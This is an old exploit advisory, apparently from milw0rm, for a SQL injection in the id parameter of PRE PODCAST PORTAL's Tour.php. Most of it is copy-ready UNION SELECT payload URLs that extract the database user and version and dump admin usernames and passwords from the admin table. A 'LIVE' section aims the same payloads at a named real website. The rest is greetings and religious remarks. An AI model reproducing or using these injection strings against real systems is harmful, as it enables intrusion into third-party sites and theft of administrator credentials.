-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= IN THE NAME OF ALLAH -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= PRE PODCAST PORTAL (Tour.php id) SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [~] Script: PRE PODCAST PORTAL [~] Language : PHP [~] Website[main]: http://www.preproject.com [~] Website[script]: http://www.preproject.com/podcast.asp [~] Type : Commercial [~] Report-Date : 05/11/2008 [~] Founder : G4N0K =============================================================================== ===[ XPL ]=== [!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17-- [!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin-- ===[ LIVE ]=== [+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17-- [+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin-- ===[ Greetz ]=== [~] ALLAH [~] Tornado2800 [~] Hussain-X //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= exit(); //EoX -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # milw0rm.com [2008-11-05]